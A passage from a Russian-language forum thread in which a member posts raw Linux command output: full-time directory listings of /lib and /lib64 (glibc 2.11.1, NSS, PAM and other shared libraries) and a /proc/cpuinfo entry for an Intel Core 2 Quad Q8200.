    drwxr-xr-x   5 root   root     4096 Apr 22  2010 xdg
    drwxr-xr-x   2 root   root     4096 Mar 20  2012 xinetd.d
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 xinit.d
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 xml
    
    Code:
    ================================================[b][COLOR=Red]ls -la --full-time /lib[/b][/COLOR]================================================
    total 7312
    drwxr-xr-x 10 root root    4096 2012-11-21 17:46:49.716188022 +0600 .
    drwxr-xr-x 24 root adm     4096 2012-12-02 12:57:02.195502987 +0600 ..
    lrwxrwxrwx  1 root root      14 2010-04-22 16:07:33.244332468 +0600 cpp -> ../usr/bin/cpp
    drwxr-xr-x 40 root root    4096 2012-02-20 10:45:24.643394837 +0600 firmware
    drwxr-xr-x  3 root root    4096 2010-04-22 03:33:57.925412546 +0600 grub
    -rwxr-xr-x  1 root root  602451 2011-11-25 21:12:55.000000000 +0600 ld-2.11.1.so
    lrwxrwxrwx  1 root root      12 2012-11-21 17:46:24.194557403 +0600 ld-linux.so.2 -> ld-2.11.1.so
    -rwxr-xr-x  1 root root    5444 2011-11-25 21:13:20.000000000 +0600 libBrokenLocale-2.11.1.so
    lrwxrwxrwx  1 root root      25 2012-11-21 17:46:24.194557403 +0600 libBrokenLocale.so.1 -> libBrokenLocale-2.11.1.so
    -rwxr-xr-x  1 root root   13700 2011-11-25 21:13:20.000000000 +0600 libSegFault.so
    -rwxr-xr-x  1 root root    9756 2011-11-25 21:13:20.000000000 +0600 libanl-2.11.1.so
    lrwxrwxrwx  1 root root      16 2012-11-21 17:46:24.207181980 +0600 libanl.so.1 -> libanl-2.11.1.so
    lrwxrwxrwx  1 root root      17 2010-04-22 03:36:10.802412511 +0600 libblkid.so.1 -> libblkid.so.1.1.0
    -rwxr-xr-x  1 root root   87804 2009-10-14 22:54:30.000000000 +0600 libblkid.so.1.1.0
    -rwxr-xr-x  1 root root 1569162 2011-11-25 21:12:56.000000000 +0600 libc-2.11.1.so
    lrwxrwxrwx  1 root root      14 2012-11-21 17:46:24.274376704 +0600 libc.so.6 -> libc-2.11.1.so
    lrwxrwxrwx  1 root root      14 2010-04-22 03:36:07.744292243 +0600 libcap.so.2 -> libcap.so.2.16
    -rw-r--r--  1 root root   17828 2009-10-04 13:03:32.000000000 +0600 libcap.so.2.16
    -rwxr-xr-x  1 root root  185824 2011-11-25 21:13:20.000000000 +0600 libcidn-2.11.1.so
    lrwxrwxrwx  1 root root      17 2012-11-21 17:46:24.287307241 +0600 libcidn.so.1 -> libcidn-2.11.1.so
    lrwxrwxrwx  1 root root      17 2010-04-22 03:36:10.828538603 +0600 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root    9616 2009-10-07 16:36:15.000000000 +0600 libcom_err.so.2.1
    -rwxr-xr-x  1 root root   67320 2011-11-25 21:13:20.000000000 +0600 libcrypt-2.11.1.so
    lrwxrwxrwx  1 root root      18 2012-11-21 17:46:24.290307121 +0600 libcrypt.so.1 -> libcrypt-2.11.1.so
    lrwxrwxrwx  1 root root      18 2012-02-20 13:09:40.454395978 +0600 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  268324 2010-03-24 01:32:52.000000000 +0500 libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root    9684 2011-11-25 21:13:20.000000000 +0600 libdl-2.11.1.so
    lrwxrwxrwx  1 root root      15 2012-11-21 17:46:24.290307121 +0600 libdl.so.2 -> libdl-2.11.1.so
    lrwxrwxrwx  1 root root      13 2010-04-22 03:36:10.829537074 +0600 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   26724 2009-10-07 16:36:15.000000000 +0600 libe2p.so.2.3
    lrwxrwxrwx  1 root root      16 2010-04-22 03:36:10.830537962 +0600 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  191384 2009-10-07 16:36:15.000000000 +0600 libext2fs.so.2.4
    -rw-r--r--  1 root root     478 2010-04-22 03:36:06.975286598 +0600 libfreebl3.chk
    -rwxr-xr-x  1 root root  319164 2009-10-19 22:31:05.000000000 +0600 libfreebl3.so
    -rwxr-xr-x  1 root root  116456 2009-10-07 22:01:45.000000000 +0600 libgcc_s-4.4.1.so.1
    lrwxrwxrwx  1 root root      19 2010-04-22 03:26:47.523286497 +0600 libgcc_s.so.1 -> libgcc_s-4.4.1.so.1
    -rwxr-xr-x  1 root root  149340 2011-11-25 21:13:20.000000000 +0600 libm-2.11.1.so
    lrwxrwxrwx  1 root root      14 2012-11-21 17:46:24.297307357 +0600 libm.so.6 -> libm-2.11.1.so
    -rwxr-xr-x  1 root root   79616 2011-11-25 21:13:20.000000000 +0600 libnsl-2.11.1.so
    lrwxrwxrwx  1 root root      16 2012-11-21 17:46:24.311182458 +0600 libnsl.so.1 -> libnsl-2.11.1.so
    -rwxr-xr-x  1 root root  229296 2009-05-30 21:20:35.000000000 +0600 libnspr4.so
    -rwxr-xr-x  1 root root 1267028 2009-10-19 22:31:05.000000000 +0600 libnss3.so
    -rwxr-xr-x  1 root root   30444 2011-11-25 21:13:20.000000000 +0600 libnss_compat-2.11.1.so
    lrwxrwxrwx  1 root root      23 2012-11-21 17:46:24.312182680 +0600 libnss_compat.so.2 -> libnss_compat-2.11.1.so
    -rwxr-xr-x  1 root root   21980 2011-11-25 21:13:20.000000000 +0600 libnss_dns-2.11.1.so
    lrwxrwxrwx  1 root root      20 2012-11-21 17:46:24.313182614 +0600 libnss_dns.so.2 -> libnss_dns-2.11.1.so
    -rwxr-xr-x  1 root root   42516 2011-11-25 21:13:20.000000000 +0600 libnss_files-2.11.1.so
    lrwxrwxrwx  1 root root      22 2012-11-21 17:46:24.315182509 +0600 libnss_files.so.2 -> libnss_files-2.11.1.so
    -rwxr-xr-x  1 root root   17904 2011-11-25 21:13:20.000000000 +0600 libnss_hesiod-2.11.1.so
    lrwxrwxrwx  1 root root      23 2012-11-21 17:46:24.315182509 +0600 libnss_hesiod.so.2 -> libnss_hesiod-2.11.1.so
    -rwxr-xr-x  1 root root   38444 2011-11-25 21:13:20.000000000 +0600 libnss_nis-2.11.1.so
    lrwxrwxrwx  1 root root      20 2012-11-21 17:46:24.317182578 +0600 libnss_nis.so.2 -> libnss_nis-2.11.1.so
    -rwxr-xr-x  1 root root   46604 2011-11-25 21:13:20.000000000 +0600 libnss_nisplus-2.11.1.so
    lrwxrwxrwx  1 root root      24 2012-11-21 17:46:24.318182803 +0600 libnss_nisplus.so.2 -> libnss_nisplus-2.11.1.so
    -rwxr-xr-x  1 root root  393480 2009-10-19 22:31:05.000000000 +0600 libnssckbi.so
    -rwxr-xr-x  1 root root  158696 2009-10-19 22:31:05.000000000 +0600 libnssdbm3.so
    -rwxr-xr-x  1 root root  101080 2009-10-19 22:31:05.000000000 +0600 libnssutil3.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:26:57.010412495 +0600 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  185676 2009-06-10 20:47:12.000000000 +0600 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root   17880 2009-05-30 21:20:35.000000000 +0600 libplc4.so
    -rwxr-xr-x  1 root root   13700 2009-05-30 21:20:35.000000000 +0600 libplds4.so
    -rwxr-xr-x  1 root root  111728 2011-11-25 21:12:56.000000000 +0600 libpthread-2.11.1.so
    lrwxrwxrwx  1 root root      20 2012-11-21 17:46:24.323182346 +0600 libpthread.so.0 -> libpthread-2.11.1.so
    -rwxr-xr-x  1 root root   71384 2011-11-25 21:13:20.000000000 +0600 libresolv-2.11.1.so
    lrwxrwxrwx  1 root root      19 2012-11-21 17:46:24.326182061 +0600 libresolv.so.2 -> libresolv-2.11.1.so
    -rwxr-xr-x  1 root root   30632 2011-11-25 21:13:20.000000000 +0600 librt-2.11.1.so
    lrwxrwxrwx  1 root root      15 2012-11-21 17:46:24.327182739 +0600 librt.so.1 -> librt-2.11.1.so
    -rwxr-xr-x  1 root root  164900 2009-10-19 22:31:05.000000000 +0600 libsmime3.so
    -rw-r--r--  1 root root     478 2010-04-22 03:36:06.968291717 +0600 libsoftokn3.chk
    -rwxr-xr-x  1 root root  250428 2009-10-19 22:31:05.000000000 +0600 libsoftokn3.so
    lrwxrwxrwx  1 root root      12 2010-04-22 03:36:10.874412143 +0600 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   22048 2009-10-07 16:36:15.000000000 +0600 libss.so.2.0
    -rwxr-xr-x  1 root root  203776 2009-10-19 22:31:05.000000000 +0600 libssl3.so
    -rwxr-xr-x  1 root root   22168 2011-11-25 21:13:20.000000000 +0600 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2012-11-21 17:46:24.328187491 +0600 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:36:13.439662504 +0600 libudev.so.0 -> libudev.so.0.5.0
    -rw-r--r--  1 root root   58960 2009-10-16 19:44:57.000000000 +0600 libudev.so.0.5.0
    -rwxr-xr-x  1 root root    9692 2011-11-25 21:13:20.000000000 +0600 libutil-2.11.1.so
    lrwxrwxrwx  1 root root      17 2012-11-21 17:46:24.329187611 +0600 libutil.so.1 -> libutil-2.11.1.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:36:10.313303994 +0600 libuuid.so.1 -> libuuid.so.1.3.0
    -rwxr-xr-x  1 root root   18004 2009-10-14 22:54:30.000000000 +0600 libuuid.so.1.3.0
    lrwxrwxrwx  1 root root      13 2010-04-22 03:26:43.222538648 +0600 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root   74632 2009-08-11 14:07:12.000000000 +0600 libz.so.1.2.3
    drwxr-xr-x  2 root root    4096 2010-04-22 03:28:09.079538194 +0600 lsb
    drwxr-xr-x  2 root root    4096 2010-04-22 03:28:10.618286625 +0600 module-init-tools
    drwxr-xr-x  4 root root    4096 2012-07-25 12:55:20.930780552 +0600 modules
    drwxr-xr-x  2 root root    4096 2010-04-22 03:28:09.034538123 +0600 resolvconf
    drwxr-xr-x  2 root root    4096 2009-09-22 15:56:57.000000000 +0600 root-mirror
    drwxr-xr-x  4 root root    4096 2012-02-20 14:34:36.157394841 +0600 udev
    
     
  11. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    продолжение:
    Code:
    ================================================[b][COLOR=Red]ls -la --full-time /lib64[/b][/COLOR]================================================
    total 12152
    drwxr-xr-x  8 root root   12288 2012-11-21 17:46:49.716188022 +0600 .
    drwxr-xr-x 24 root adm     4096 2012-12-02 12:57:02.195502987 +0600 ..
    drwxr-xr-x  2 root root    4096 2010-04-22 03:28:00.359662678 +0600 bdevid
    drwxr-xr-x  2 root root    4096 2010-04-22 03:27:04.335286595 +0600 dbus-1
    lrwxrwxrwx  1 root root      32 2010-04-22 17:26:15.139292564 +0600 iptables -> /lib64/iptables.d/linux-2.6-main
    drwxr-xr-x  3 root root    4096 2010-04-22 17:26:14.737289995 +0600 iptables.d
    -rwxr-xr-x  1 root root  714050 2011-11-25 21:09:31.000000000 +0600 ld-2.11.1.so
    lrwxrwxrwx  1 root root      12 2012-11-21 17:46:24.353182319 +0600 ld-linux-x86-64.so.2 -> ld-2.11.1.so
    -rwxr-xr-x  1 root root    6184 2011-11-25 21:13:20.000000000 +0600 libBrokenLocale-2.11.1.so
    lrwxrwxrwx  1 root root      25 2012-11-21 17:46:24.353182319 +0600 libBrokenLocale.so.1 -> libBrokenLocale-2.11.1.so
    -rwxr-xr-x  1 root root   18608 2011-11-25 21:13:19.000000000 +0600 libSegFault.so
    lrwxrwxrwx  1 root root      15 2010-04-22 03:26:50.846664793 +0600 libacl.so.1 -> libacl.so.1.1.0
    -rw-r--r--  1 root root   31120 2009-08-26 01:27:11.000000000 +0600 libacl.so.1.1.0
    -rwxr-xr-x  1 root root   14768 2011-11-25 21:13:20.000000000 +0600 libanl-2.11.1.so
    lrwxrwxrwx  1 root root      16 2012-11-21 17:46:24.355182733 +0600 libanl.so.1 -> libanl-2.11.1.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:26:50.693413739 +0600 libattr.so.1 -> libattr.so.1.1.0
    -rw-r--r--  1 root root   18592 2009-08-10 03:25:41.000000000 +0600 libattr.so.1.1.0
    lrwxrwxrwx  1 root root      17 2010-04-22 03:26:49.250413564 +0600 libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x  1 root root  108888 2009-07-28 01:12:57.000000000 +0600 libaudit.so.0.0.0
    lrwxrwxrwx  1 root root      19 2010-04-22 03:26:49.255413114 +0600 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x  1 root root   59832 2009-07-28 01:12:57.000000000 +0600 libauparse.so.0.0.0
    lrwxrwxrwx  1 root root      17 2010-04-22 03:27:19.564412840 +0600 libblkid.so.1 -> libblkid.so.1.1.0
    -rwxr-xr-x  1 root root   93016 2009-10-14 22:53:16.000000000 +0600 libblkid.so.1.1.0
    -rwxr-xr-x  1 root root     932 2009-09-26 02:50:23.000000000 +0600 libbluetooth.la
    lrwxrwxrwx  1 root root      21 2012-02-20 13:09:21.562520371 +0600 libbluetooth.so -> libbluetooth.so.3.4.0
    lrwxrwxrwx  1 root root      21 2010-04-22 03:31:48.741287867 +0600 libbluetooth.so.3 -> libbluetooth.so.3.4.0
    -rwxr-xr-x  1 root root  103296 2009-09-26 02:50:30.000000000 +0600 libbluetooth.so.3.4.0
    -rwxr-xr-x  1 root root 1711148 2011-11-25 21:12:56.000000000 +0600 libc-2.11.1.so
    lrwxrwxrwx  1 root root      14 2012-11-21 17:46:24.418182088 +0600 libc.so.6 -> libc-2.11.1.so
    -rw-r--r--  1 root root   95160 2009-10-04 13:02:45.000000000 +0600 libcap.a
    lrwxrwxrwx  1 root root      11 2010-05-21 14:02:23.668002560 +0600 libcap.so -> libcap.so.2
    lrwxrwxrwx  1 root root      14 2010-04-22 03:26:52.589412302 +0600 libcap.so.2 -> libcap.so.2.16
    -rw-r--r--  1 root root   18640 2009-10-04 13:02:46.000000000 +0600 libcap.so.2.16
    -rwxr-xr-x  1 root root  190768 2011-11-25 21:13:19.000000000 +0600 libcidn-2.11.1.so
    lrwxrwxrwx  1 root root      17 2012-11-21 17:46:24.421182793 +0600 libcidn.so.1 -> libcidn-2.11.1.so
    lrwxrwxrwx  1 root root      17 2010-04-22 03:27:25.236425647 +0600 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root   14480 2009-10-07 16:38:42.000000000 +0600 libcom_err.so.2.1
    lrwxrwxrwx  1 root root      17 2010-04-22 03:26:49.081412457 +0600 libcrack.so.2 -> libcrack.so.2.8.0
    -rwxr-xr-x  1 root root   39224 2009-08-10 05:15:47.000000000 +0600 libcrack.so.2.8.0
    -rwxr-xr-x  1 root root   59968 2011-11-25 21:13:20.000000000 +0600 libcrypt-2.11.1.so
    lrwxrwxrwx  1 root root      18 2012-11-21 17:46:24.423187113 +0600 libcrypt.so.1 -> libcrypt-2.11.1.so
    -rwxr-xr-x  1 root root 1062088 2009-09-25 20:48:19.000000000 +0600 libdb_nss-4.7.so
    lrwxrwxrwx  1 root root      18 2010-04-22 03:27:03.965414606 +0600 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  257424 2009-10-05 21:33:29.000000000 +0600 libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  120040 2009-10-13 15:49:55.000000000 +0600 libdevmapper.so.1.02
    -rwxr-xr-x  1 root root   14616 2011-11-25 21:13:19.000000000 +0600 libdl-2.11.1.so
    lrwxrwxrwx  1 root root      15 2012-11-21 17:46:24.423187113 +0600 libdl.so.2 -> libdl-2.11.1.so
    lrwxrwxrwx  1 root root      13 2010-04-22 03:27:25.237538027 +0600 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   27928 2009-10-07 16:38:42.000000000 +0600 libe2p.so.2.3
    lrwxrwxrwx  1 root root      16 2010-04-22 03:27:25.238537415 +0600 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  189344 2009-10-07 16:38:42.000000000 +0600 libext2fs.so.2.4
    -rw-r--r--  1 root root     478 2010-04-22 03:27:36.318292207 +0600 libfreebl3.chk
    -rwxr-xr-x  1 root root  404776 2009-10-19 22:28:18.000000000 +0600 libfreebl3.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:35:00.257291887 +0600 libfuse.so.2 -> libfuse.so.2.8.1
    -rwxr-xr-x  1 root root  218288 2009-09-27 22:32:43.000000000 +0600 libfuse.so.2.8.1
    -rwxr-xr-x  1 root root   89144 2009-10-07 22:01:45.000000000 +0600 libgcc_s-4.4.1.so.1
    lrwxrwxrwx  1 root root      19 2010-04-22 03:26:47.528287791 +0600 libgcc_s.so.1 -> libgcc_s-4.4.1.so.1
    lrwxrwxrwx  1 root root      15 2010-04-22 03:35:30.170289811 +0600 libgpm.so.2 -> libgpm.so.2.1.0
    -rwxr-xr-x  1 root root   26864 2009-09-02 21:37:52.000000000 +0600 libgpm.so.2.1.0
    lrwxrwxrwx  1 root root      15 2010-04-22 16:17:10.296457873 +0600 libhistory.so -> libhistory.so.6
    lrwxrwxrwx  1 root root      17 2010-04-22 16:16:58.569333169 +0600 libhistory.so.5 -> libhistory.so.5.2
    -r-xr-xr-x  1 root root   35376 2009-01-14 05:29:31.000000000 +0500 libhistory.so.5.2
    lrwxrwxrwx  1 root root      17 2010-04-22 03:27:45.143413184 +0600 libhistory.so.6 -> libhistory.so.6.0
    -rwxr-xr-x  1 root root   35064 2009-06-29 01:19:22.000000000 +0600 libhistory.so.6.0
    lrwxrwxrwx  1 root root      16 2010-04-22 03:28:04.763539251 +0600 libintl.so.8 -> libintl.so.8.0.2
    -rw-r--r--  1 root root   39328 2009-09-02 19:27:14.000000000 +0600 libintl.so.8.0.2
    -rwxr-xr-x  1 root root   32056 2008-08-05 12:41:07.000000000 +0600 libiw.so.29
    -rwxr-xr-x  1 root root    7128 2009-10-04 22:33:38.000000000 +0600 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2010-04-22 03:31:08.675414114 +0600 libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x  1 root root  530656 2011-11-25 21:13:19.000000000 +0600 libm-2.11.1.so
    lrwxrwxrwx  1 root root      14 2012-11-21 17:46:24.450182127 +0600 libm.so.6 -> libm-2.11.1.so
    lrwxrwxrwx  1 root root      20 2010-04-22 03:28:01.954580216 +0600 libmodprobe.so.0 -> libmodprobe.so.0.0.0
    -rwxr-xr-x  1 root root   26960 2009-10-21 19:21:36.000000000 +0600 libmodprobe.so.0.0.0
    lrwxrwxrwx  1 root root      15 2010-04-22 16:15:24.126081938 +0600 libncurses.so -> libncurses.so.5
    lrwxrwxrwx  1 root root      17 2010-04-22 03:26:43.390413378 +0600 libncurses.so.5 -> libncurses.so.5.7
    -rwxr-xr-x  1 root root  333592 2009-05-17 10:39:41.000000000 +0600 libncurses.so.5.7
    -rwxr-xr-x  1 root root   88976 2011-11-25 21:13:19.000000000 +0600 libnsl-2.11.1.so
    lrwxrwxrwx  1 root root      16 2012-11-21 17:46:24.453182214 +0600 libnsl.so.1 -> libnsl-2.11.1.so
    -rwxr-xr-x  1 root root  236408 2009-05-30 22:29:05.000000000 +0600 libnspr4.so
    -rwxr-xr-x  1 root root 1247800 2009-10-19 22:28:18.000000000 +0600 libnss3.so
    -rwxr-xr-x  1 root root   35640 2011-11-25 21:13:19.000000000 +0600 libnss_compat-2.11.1.so
    lrwxrwxrwx  1 root root      23 2012-11-21 17:46:24.455187627 +0600 libnss_compat.so.2 -> libnss_compat-2.11.1.so
    -rwxr-xr-x  1 root root   22848 2011-11-25 21:13:19.000000000 +0600 libnss_dns-2.11.1.so
    lrwxrwxrwx  1 root root      20 2012-11-21 17:46:24.456183093 +0600 libnss_dns.so.2 -> libnss_dns-2.11.1.so
    -rwxr-xr-x  1 root root   47536 2011-11-25 21:13:19.000000000 +0600 libnss_files-2.11.1.so
    lrwxrwxrwx  1 root root      22 2012-11-21 17:46:24.458187575 +0600 libnss_files.so.2 -> libnss_files-2.11.1.so
    -rwxr-xr-x  1 root root   18792 2011-11-25 21:13:20.000000000 +0600 libnss_hesiod-2.11.1.so
    lrwxrwxrwx  1 root root      23 2012-11-21 17:46:24.458187575 +0600 libnss_hesiod.so.2 -> libnss_hesiod-2.11.1.so
    -rwxr-xr-x  1 root root   10312 2009-09-03 07:21:35.000000000 +0600 libnss_mdns.so.2
    -rwxr-xr-x  1 root root   10312 2009-09-03 07:21:35.000000000 +0600 libnss_mdns4.so.2
    -rwxr-xr-x  1 root root   10296 2009-09-03 07:21:35.000000000 +0600 libnss_mdns4_minimal.so.2
    -rwxr-xr-x  1 root root   10312 2009-09-03 07:21:35.000000000 +0600 libnss_mdns6.so.2
    -rwxr-xr-x  1 root root   10296 2009-09-03 07:21:35.000000000 +0600 libnss_mdns6_minimal.so.2
    -rwxr-xr-x  1 root root   10296 2009-09-03 07:21:35.000000000 +0600 libnss_mdns_minimal.so.2
    -rwxr-xr-x  1 root root   43464 2011-11-25 21:13:19.000000000 +0600 libnss_nis-2.11.1.so
    lrwxrwxrwx  1 root root      20 2012-11-21 17:46:24.460182405 +0600 libnss_nis.so.2 -> libnss_nis-2.11.1.so
    -rwxr-xr-x  1 root root   51616 2011-11-25 21:13:20.000000000 +0600 libnss_nisplus-2.11.1.so
    lrwxrwxrwx  1 root root      24 2012-11-21 17:46:24.462182323 +0600 libnss_nisplus.so.2 -> libnss_nisplus-2.11.1.so
    -rwxr-xr-x  1 root root    6768 2009-09-03 14:06:00.000000000 +0600 libnss_tcb.so.2
    
    Code:
    -rwxr-xr-x  1 root root  519296 2009-10-19 22:28:18.000000000 +0600 libnssckbi.so
    -rwxr-xr-x  1 root root  160984 2009-10-19 22:28:18.000000000 +0600 libnssdbm3.so
    -rwxr-xr-x  1 root root  120664 2009-10-19 22:28:18.000000000 +0600 libnssutil3.so
    lrwxrwxrwx  1 root root      20 2010-04-22 03:34:08.126489557 +0600 libntfs-3g.so.54 -> libntfs-3g.so.54.0.0
    -rwxr-xr-x  1 root root  271440 2009-09-21 20:43:25.000000000 +0600 libntfs-3g.so.54.0.0
    lrwxrwxrwx  1 root root      16 2010-04-22 03:26:49.418413924 +0600 libpam.so.0 -> libpam.so.0.82.1
    -rwxr-xr-x  1 root root   51672 2009-10-07 00:33:30.000000000 +0600 libpam.so.0.82.1
    lrwxrwxrwx  1 root root      21 2010-04-22 03:26:49.421412083 +0600 libpam_misc.so.0 -> libpam_misc.so.0.82.0
    -rwxr-xr-x  1 root root   14432 2009-10-07 00:33:30.000000000 +0600 libpam_misc.so.0.82.0
    lrwxrwxrwx  1 root root      17 2010-04-22 03:26:49.422413128 +0600 libpamc.so.0 -> libpamc.so.0.82.1
    -rwxr-xr-x  1 root root   14448 2009-10-07 00:33:30.000000000 +0600 libpamc.so.0.82.1
    lrwxrwxrwx  1 root root      16 2010-04-22 03:26:49.169665133 +0600 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  186392 2009-06-10 20:46:38.000000000 +0600 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root   18664 2009-05-30 22:29:05.000000000 +0600 libplc4.so
    -rwxr-xr-x  1 root root   14432 2009-05-30 22:29:05.000000000 +0600 libplds4.so
    lrwxrwxrwx  1 root root      15 2010-04-22 03:28:10.352287520 +0600 libply.so.2 -> libply.so.2.0.0
    -rwxr-xr-x  1 root root   93328 2009-10-29 17:50:35.000000000 +0500 libply.so.2.0.0
    -rwxr-xr-x  1 root root   62728 2009-05-29 00:36:53.000000000 +0600 libproc-3.2.8.so
    -rwxr-xr-x  1 root root  130449 2011-11-25 21:12:56.000000000 +0600 libpthread-2.11.1.so
    lrwxrwxrwx  1 root root      20 2012-11-21 17:46:24.466187145 +0600 libpthread.so.0 -> libpthread-2.11.1.so
    lrwxrwxrwx  1 root root      16 2010-04-22 16:17:10.296457873 +0600 libreadline.so -> libreadline.so.6
    lrwxrwxrwx  1 root root      18 2010-04-22 16:16:58.571331900 +0600 libreadline.so.5 -> libreadline.so.5.2
    -r-xr-xr-x  1 root root  259984 2009-01-14 05:29:31.000000000 +0500 libreadline.so.5.2
    lrwxrwxrwx  1 root root      18 2010-04-22 03:27:45.146412502 +0600 libreadline.so.6 -> libreadline.so.6.0
    -rwxr-xr-x  1 root root  267488 2009-06-29 01:19:22.000000000 +0600 libreadline.so.6.0
    -rwxr-xr-x  1 root root   14432 2009-09-03 12:19:31.000000000 +0600 libresmgr.so.1.0
    -rwxr-xr-x  1 root root   84736 2011-11-25 21:13:20.000000000 +0600 libresolv-2.11.1.so
    lrwxrwxrwx  1 root root      19 2012-11-21 17:46:24.469187152 +0600 libresolv.so.2 -> libresolv-2.11.1.so
    -rwxr-xr-x  1 root root   31664 2011-11-25 21:13:19.000000000 +0600 librt-2.11.1.so
    lrwxrwxrwx  1 root root      15 2012-11-21 17:46:24.471182347 +0600 librt.so.1 -> librt-2.11.1.so
    -rwxr-xr-x  1 root root  173512 2009-10-19 22:28:18.000000000 +0600 libsmime3.so
    -rw-r--r--  1 root root     478 2010-04-22 03:27:36.310292112 +0600 libsoftokn3.chk
    -rwxr-xr-x  1 root root  253992 2009-10-19 22:28:18.000000000 +0600 libsoftokn3.so
    lrwxrwxrwx  1 root root      12 2010-04-22 03:27:25.359536760 +0600 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   27040 2009-10-07 16:38:42.000000000 +0600 libss.so.2.0
    -rwxr-xr-x  1 root root  209384 2009-10-19 22:28:18.000000000 +0600 libssl3.so
    lrwxrwxrwx  1 root root      17 2010-04-22 03:28:03.389412582 +0600 libsysfs.so.2 -> libsysfs.so.2.0.1
    -rwxr-xr-x  1 root root   47528 2008-12-22 20:43:01.000000000 +0500 libsysfs.so.2.0.1
    lrwxrwxrwx  1 root root      15 2010-04-22 03:26:52.619413037 +0600 libtcb.so.0 -> libtcb.so.0.9.8
    -rwxr-xr-x  1 root root  270176 2009-09-03 14:06:00.000000000 +0600 libtcb.so.0.9.8
    lrwxrwxrwx  1 root root      19 2010-04-22 03:26:43.025661697 +0600 libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   14456 2009-09-03 04:10:35.000000000 +0600 libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   27296 2011-11-25 21:13:20.000000000 +0600 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2012-11-21 17:46:24.485408219 +0600 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:27:21.466305810 +0600 libudev.so.0 -> libudev.so.0.5.0
    -rw-r--r--  1 root root   59912 2009-10-16 19:41:27.000000000 +0600 libudev.so.0.5.0
    lrwxrwxrwx  1 root root      20 2010-04-22 03:35:00.287412097 +0600 libulockmgr.so.1 -> libulockmgr.so.1.0.1
    -rwxr-xr-x  1 root root   10304 2009-09-27 22:32:43.000000000 +0600 libulockmgr.so.1.0.1
    lrwxrwxrwx  1 root root      19 2010-04-22 03:27:19.353540657 +0600 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
    -rwxr-xr-x  1 root root   18528 2009-09-18 19:25:00.000000000 +0600 libusb-0.1.so.4.4.4
    lrwxrwxrwx  1 root root      19 2010-04-22 03:27:19.249539978 +0600 libusb-1.0.so.0 -> libusb-1.0.so.0.0.0
    -rwxr-xr-x  1 root root   51616 2009-09-18 19:26:57.000000000 +0600 libusb-1.0.so.0.0.0
    -rwxr-xr-x  1 root root   10568 2011-11-25 21:13:19.000000000 +0600 libutil-2.11.1.so
    lrwxrwxrwx  1 root root      17 2012-11-21 17:46:24.486201677 +0600 libutil.so.1 -> libutil-2.11.1.so
    lrwxrwxrwx  1 root root      16 2010-04-22 03:27:19.466413902 +0600 libuuid.so.1 -> libuuid.so.1.3.0
    -rwxr-xr-x  1 root root   18872 2009-10-14 22:53:16.000000000 +0600 libuuid.so.1.3.0
    lrwxrwxrwx  1 root root      19 2010-04-22 17:26:14.728290077 +0600 libxtables.so.2 -> libxtables.so.2.1.0
    -rwxr-xr-x  1 root root   31224 2009-09-18 21:46:02.000000000 +0600 libxtables.so.2.1.0
    lrwxrwxrwx  1 root root      13 2010-04-22 03:26:43.382332260 +0600 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root   85232 2009-08-11 14:07:12.000000000 +0600 libz.so.1.2.3
    drwxr-xr-x  2 root root    4096 2010-04-22 03:28:02.440411760 +0600 module-init-tools
    drwxr-xr-x  3 root root    4096 2010-04-22 03:29:25.004413141 +0600 security
    drwxr-xr-x  2 root root    4096 2010-04-22 03:28:03.781292273 +0600 tc
    
    Code:
    ================================================[b][COLOR=Red]cat /proc/cpuinfo[/b][/COLOR]================================================
    processor	: 0
    vendor_id	: GenuineIntel
    cpu family	: 6
    model		: 23
    model name	: Intel(R) Core(TM)2 Quad CPU    Q8200  @ 2.33GHz
    stepping	: 10
    cpu MHz		: 2333.246
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 4
    core id		: 0
    cpu cores	: 4
    apicid		: 0
    initial apicid	: 0
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 13
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm
    bogomips	: 4666.49
